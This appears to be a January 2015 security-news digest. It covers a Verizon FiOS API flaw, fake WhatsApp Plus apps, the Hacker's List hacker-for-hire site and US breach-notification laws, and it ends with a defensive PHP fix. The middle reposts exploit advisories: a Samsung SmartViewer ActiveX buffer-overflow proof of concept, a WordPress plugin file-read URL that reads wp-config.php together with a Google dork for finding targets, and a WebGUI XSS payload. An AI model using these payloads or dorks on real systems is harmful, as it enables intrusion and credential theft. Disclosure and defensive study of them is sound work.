The FiOS API flaw was discovered by XDA senior software developer Randy Westergren on January 14, 2015, when he found that it was possible to not only read the contents of other users' inboxes, but also send messages on their behalf. The issue was discovered while analyzing traffic generated by the Android version of My FiOS, which is used for account management, email and scheduling video recordings.

Westergren took time to put together a proof-of-concept showing serious cause for concern, and then reported it to Verizon. The telecom giant acknowledged the researcher's notification the same day and issued a fix on Friday, just two days after the vulnerability was disclosed. That's precisely how it should be done - quickly and efficiently.

Microsoft could learn a lot more from Verizon, as Microsoft wasn't able to fix the security flaws in its software reported by Google’s Project Zero team even after the three-month-long time period provided to the company. One after another, three serious zero-day vulnerabilities in Windows 7 and 8.1 were disclosed by Google’s security team before Microsoft planned to patch them.

The FiOS API flaw, actually contained in the application’s API, allowed any account to be accessed by manipulating user identification numbers in web requests, giving attackers the ability to read individual messages from a person’s Verizon inbox. According to the security researcher, the vulnerability even allowed attackers to send email messages from victims’ accounts, and he found and exploited further vulnerable API calls.

"It was my suspicion that all of the API methods for this widget within the app were vulnerable. My last test was sending an outgoing message as another user [which was] also successful," Westergren wrote.

The problem has been fixed by the telecom giant, so there is no need for users to worry about it. Verizon rewarded Westergren with a year's worth of free internet.

"Verizon's (corporate) security group seemed to immediately realize the impact of this vulnerability and took it very seriously," Westergren said.

Source
Several reports from popular news websites had suggested that WhatsApp, the widely popular messaging application, is working on a new version of its instant messaging client, called WhatsApp PLUS, in order to provide its users with a lot of handy new features. However, the news seems to be completely fake!!

WhatsApp Plus was launched long ago and is not at all genuine, as it is not associated with the Facebook-owned WhatsApp. Many users claimed to have already used WhatsApp Plus before.

The latest news reports insist that WhatsApp Plus will bring 700 new themes and more emoticons, and will provide users with an option to change the font and color, among other things, in an attempt to make the app look and feel more personalized. Moreover, the app will supposedly provide better privacy compared to the existing one. But here you need to have a second thought.

If we talk about better privacy, the only genuine report about WhatsApp came late last year, when WhatsApp partnered with Open Whisper Systems, a collaborative open source project, to offer end-to-end encryption in its Android client. But that was also under the same label, WhatsApp.

The domain of WhatsApp Plus wasn't registered by WhatsApp, Inc, according to the Whois information of the alleged WhatsApp website. In order to find links to shady websites, BGR reports that they decompiled the WhatsApp Plus APK file circulating around the web, which revealed that the "app is communicating with illegitimate sources."

Beware, those who find the app genuine and interesting to download. There are many fake and malicious messaging apps that trick users into downloading and installing what could potentially be malware. WhatsApp Plus is also not genuine, but an effort by unauthorised websites to trick people into downloading it. We strongly advise people not to download WhatsApp Plus, or any app that claims to be a new, rather different version of WhatsApp.

It has been confirmed that WhatsApp hasn't launched any such app. The app could be malware that can trouble your phone, and downloading such an alternative would put your privacy and security at risk.

Source
-
Want to hack someone's Facebook account? Or Gmail account? Or break into somebody's network? But don't have the hacking skills to do so? There's no need to worry at all. A new service is out there for you guys where you can search for professional hackers and hire them to accomplish any hacking task.

Dubbed Hacker's List, the new service offers to connect customers and "professional" hackers for hire. The service would make any tech-illiterate person capable of breaking into his boss' email address. This really sounds like something that happens mostly in movies, as if I'm hiring a hacker to accomplish crimes for me.

Hacker's List, the three-month-old website — launched in November — has received over 500 hacking jobs so far and is waiting for successful bidders. There are around 70 anonymous hacker profiles displayed on the website, but many of them are inactive at the moment.

The website charges a fee on a project and payment is cleared on completion of the work, just like freelancing sites. Based on hours, prices of hackers range from $28 to $300, and full hacking projects range in price from $100 to $5000. As you might expect, it's all done anonymously — fees are collected when tasks are completed, and nobody knows the identity of those involved in doing the work.

Several projects ranging from 'Hacking into Facebook account', 'Hacking into Gmail accounts', 'Hacking into websites' and 'Hacking into business accounts' are listed on the website. Surprisingly, many jobs listed on the website are from customers pleading for hackers to break into school systems in order to change grades. You can have a look below to see a list of some jobs, together with the price customers are willing to pay:

$300-$500: I need a hack for an Android Game called "Iron Force" developed by "Chillingo". It's a dynamic Server game, frequently updated. very hard to hack. I need a hack that give diamonds and cash on this game and if possible a auto-play robot system for my account.

$10-$350: Need some info and messages from a Facebook account. Other jobs to come if successful.

$300-$600: I need a hacker to change my final grade, it should be done in a week.

$200-$300: Hack into a company email account. Copy all emails in that account. Give copies of the emails employer. Send spam emails confessing to lying and defamation of character to everyone in the email list.

Hacker's List, a website registered in New Zealand, has become the first website ever to provide "ethical hacking" services. While the activities listed on the site are clearly illegal in some cases, the website asks users not to "use the service for any illegal purposes," as laid out in its 10-page long terms and conditions section.

Source
-
<html>
<!--
Samsung SmartViewer BackupToAvi Remote Code Execution PoC
PoC developed by Praveen Darshanam
For more details refer
http://darshanams.blogspot.com
http://blog.disects.com/2015/01/samsung-smartviewer-backuptoavi-remote.html
Original Vulnerability Discovered by rgod
Vulnerable: Samsung SmartViewer 3.0
Tested on Windows 7 Ultimate N SP1
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265
-->
<object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' ></object>
<script >
var payload_length = 15000;
var arg1=1;
var arg2=1;
var arg3=1;
//blank strings
var junk = "";
var buf1 = "";
var buf2 = "";
//offset to SE is 156, initial analysis using metasploit cyclic pattern
for (i=0; i<156; i++) {
  buf1 += "A";
}
var nseh = "DD";
var seh = "\x87\x10"; //from Vulnerable DLL
junk = buf1 + nseh + seh;
//remaining buffer
for (j=0; j<(payload_length-junk.length); j++) {
  buf2 += "B";
}
//final malicious buffer
var fbuff = junk + buf2;
target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff);
</script>
</html>

Source
-
# Exploit Title: CIP4 Folder Download Widget LFI
# Google Dork: index of :/cip4-folder-download-widget
# Date: 13-01-2015
# Exploit Author: Ben khlifa Fahmi (XTnR3v0lt)
# Vendor Homepage: http://community.cip4.org
# Software Link: https://wordpress.org/plugins/cip4-folder-download-widget/
# Version: 1.10
# Tested on: Ubuntu 14.04

Dork : inurl:/wp-content/plugins/cip4-folder-download-widget/

Exploit :
http://localhost/[wordpress]/wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=wp-config.php&info=wp-config.php

Ben khlifa Fahmi - Founder & CEO of Tunisian Cyber Army
Greetz to : Joseph - Michou - hackerXben - RaisoMos - Lola - All muslim hackers world wide

Source
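The advisory above shows a download script serving whatever file name arrives in the target parameter. One way such a handler can confine that parameter to a single downloads directory, as an added example written for this post (not the plugin's own code; the function name and the downloads directory are assumptions):

```php
<?php
// Added example, not the plugin's code: confine a user-supplied "target"
// file name to one downloads directory before serving it.
// Assumptions: downloads live in a fixed directory ($baseDir) and the
// function name is hypothetical.

function cip4_safe_download_path(string $baseDir, string $target): ?string
{
    // NUL bytes and empty names are never valid file names.
    if ($target === '' || strpos($target, "\0") !== false) {
        return null;
    }
    // Allow only a bare file name: any directory part ("../", "/etc/")
    // makes basename() differ from the input, so it is rejected.
    if (basename($target) !== $target) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $target);
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    // Defence in depth: the canonical path must sit under the canonical base,
    // so a symlink inside the directory cannot lead outside it.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

// Constructed demonstration: a request like the advisory's
// ?target=wp-config.php resolves only if a file of that name sits
// inside the downloads directory, never to the site's wp-config.php.
$baseDir = __DIR__ . '/downloads';            // assumed downloads directory
$target  = $_GET['target'] ?? 'wp-config.php';
$path    = cip4_safe_download_path($baseDir, $target);
if ($path === null) {
    http_response_code(404);
    exit('No such download.');
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
readfile($path);
```

The basename() check alone would reject traversal; the realpath() comparison additionally catches symlinks placed inside the directory that point elsewhere.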
-
Exploit Title: WebGUI 7.10.29 stable version Cross site scripting vulnerability
Software Link: http://www.webgui.org/download
Author: SECUPENT
Website: www.secupent.com
Email: research{at}secupent{dot}com
Date: 17-1-2015
Version: 7.10.29. Previous version maybe vulnerable also.

Vulnerable area: http://localhost/style-underground/search

XSS PoC: 1" onmouseover=prompt(907460) bad="

Screenshot:
Link: http://secupent.com/exploit/images/webgui-xss.png
Mirror: http://vulnerability.io/exploit/images/webgui-xss.png

Reference: http://secupent.com/exploit/WebGUI-7.10.29-XSS.txt

Special Thanks: vulnerability.io, pentester.io, osvdb.org, exploit-db.com, 1337day.com, cxsecurity.com, packetstormsecurity.com and all other exploit archives, hackers and security researchers.

Source
-
Breach Notification refers to the notification that businesses, government agencies and other entities are required by law in most states to give when certain personally identifiable information is obtained, or believed to have been obtained, by an unauthorized party. The breach can occur when a system is hacked or when a device containing sensitive information is lost, stolen or inadvertently sold.

Personally identifiable information, also known as PII, is information that on its own or in conjunction with other information can be used to identify a person—the latter can include, for example, a name combined with a Social Security number, driver's license number, bank account or credit card number.

The first state breach notification law was passed in California in 2002 and went into effect the following year. One of the first breaches reported under the new law occurred in 2004, when the bank card processing company CardSystems Solutions was hacked. CardSystems Solutions processed purchasing transactions for its retailer customers by sending the card account data to the correct bank or issuer for authorization. Some 263,000 card numbers were verified stolen in the hack, but nearly 40 million card numbers were exposed to the hackers. The data involved card transactions that CardSystems had retained on its system long after the transactions were completed and that had been stored in an unencrypted format. The breach began in September 2004 but wasn't discovered until May 2005. It was the first major breach disclosed under the new California law.

Also among the first companies disclosing a breach under the new law was ChoicePoint. The data broker sent letters to 145,000 people in February 2005 notifying them that it had mistakenly sold personal data about them to identity thieves. ChoicePoint was in the business of collecting financial, medical and other information on billions of people in order to sell it to marketers, other businesses and government agencies. The thieves had posed as legitimate businesses to open customer accounts with the massive data broker, then subsequently succeeded in purchasing Social Security numbers, credit histories and other information that ChoicePoint had collected on them.

Since the California law was passed, another forty-six states and the District of Columbia have passed similar legislation. Alabama, New Mexico and South Dakota do not have breach laws. This patchwork of laws has resulted in uneven and confusing requirements for businesses with customers in multiple states. The laws vary on a number of things, including when notification needs to occur, how notification should occur and exemptions from notification.

Federal lawmakers have been trying for years to remedy this confusing patchwork of laws by passing a federal law that would take precedence over all of them. But the proposed bills have failed to take hold on Capitol Hill. President Obama and the White House began pushing another bill in January 2015 that would require breached entities to notify affected victims within 30 days of discovering the breach, though critics say this renewed push for a mandatory notification period will likely suffer the same problems previous bills had.

Source